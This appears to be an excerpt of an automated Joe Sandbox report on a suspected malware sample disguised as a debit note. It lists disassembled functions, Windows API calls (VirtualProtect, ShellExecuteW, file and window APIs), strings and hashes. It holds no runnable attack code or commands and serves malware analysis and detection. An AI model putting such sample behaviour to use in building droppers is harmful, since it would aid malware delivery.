ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Function 00402295 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b1f67d0bd68f695adc8489e74b7692cd90077e549d5f6d1bde923581f8f3e0ae
Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
Opcode Fuzzy Hash: b1f67d0bd68f695adc8489e74b7692cd90077e549d5f6d1bde923581f8f3e0ae
Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A

Function 004041E6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D

Function 0040330F Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D

Function 004041CF Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19

Function 004041BC Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E6

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8ba86804e83874a1906e97ec6801ccf3b7d57510e6f7f4a869b12a6ffab4bff6
Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
Opcode Fuzzy Hash: 8ba86804e83874a1906e97ec6801ccf3b7d57510e6f7f4a869b12a6ffab4bff6
Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39

Non-executed Functions

Function 00404B6E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B86
GetDlgItem.USER32(?,00000408), ref: 00404B91
GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
LoadBitmapW.USER32(0000006E), ref: 00404BEE
SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
DeleteObject.GDI32(00000000), ref: 00404C64
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
ShowWindow.USER32(?,00000005), ref: 00404DBE
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
ImageList_Destroy.COMCTL32(?), ref: 00404F8E
GlobalFree.KERNEL32(?), ref: 00404F9E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
ShowWindow.USER32(?,00000000), ref: 0040513D
GetDlgItem.USER32(?,000003FE), ref: 00405148
ShowWindow.USER32(00000000), ref: 0040514F

Strings

, xrefs: 00405127
M, xrefs: 00404D18
N, xrefs: 00404DF9

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
Opcode Fuzzy Hash: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58

Function 00404635 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 265stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404684
SetWindowTextW.USER32(00000000,?), ref: 004046AE
SHBrowseForFolderW.SHELL32(?), ref: 0040475F
CoTaskMemFree.OLE32(00000000), ref: 0040476A
lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
lstrcatW.KERNEL32(?,Call), ref: 004047A8
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA

Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B

Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 0040623F
Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406253
Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406266

GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F

Strings

&B, xrefs: 00404732
C:\Users\user\brugerlicensaftalerne, xrefs: 00404785
A, xrefs: 00404758
Call, xrefs: 00404796, 0040479B, 004047A6

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\brugerlicensaftalerne$Call$&B
API String ID: 2246997448-41963567
Opcode ID: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
Opcode Fuzzy Hash: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69

Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD

Strings

C:\Users\user\brugerlicensaftalerne\Isidora, xrefs: 004020FB

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\brugerlicensaftalerne\Isidora
API String ID: 542301482-431281164
Opcode ID: c3ac8376005eb2128101160bb39d3078d5e8ab7fad74fdd7db3a3b4458e935d7
Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
Opcode Fuzzy Hash: c3ac8376005eb2128101160bb39d3078d5e8ab7fad74fdd7db3a3b4458e935d7
Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54

Function 00402770 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: c29cc584e89206ddd90cc1717f0c3dadd219838f9a220d036a6385bc3b1c76f5
Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
Opcode Fuzzy Hash: c29cc584e89206ddd90cc1717f0c3dadd219838f9a220d036a6385bc3b1c76f5
Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A

Function 00404337 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
GetDlgItem.USER32(?,000003E8), ref: 004043E9
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
GetSysColor.USER32(?), ref: 00404417
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
lstrlenW.KERNEL32(?), ref: 00404438
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
GetDlgItem.USER32(?,0000040A), ref: 004044B3
SendMessageW.USER32(00000000), ref: 004044BA
GetDlgItem.USER32(?,000003E8), ref: 004044E5
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
LoadCursorW.USER32(00000000,00007F02), ref: 00404536
SetCursor.USER32(00000000), ref: 00404539
ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
SetCursor.USER32(00000000), ref: 0040455D
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E

Strings

N, xrefs: 004044D3
open, xrefs: 00404546
Call, xrefs: 00404514

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open
API String ID: 3615053054-2563687911
Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99

Function 00405C66 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
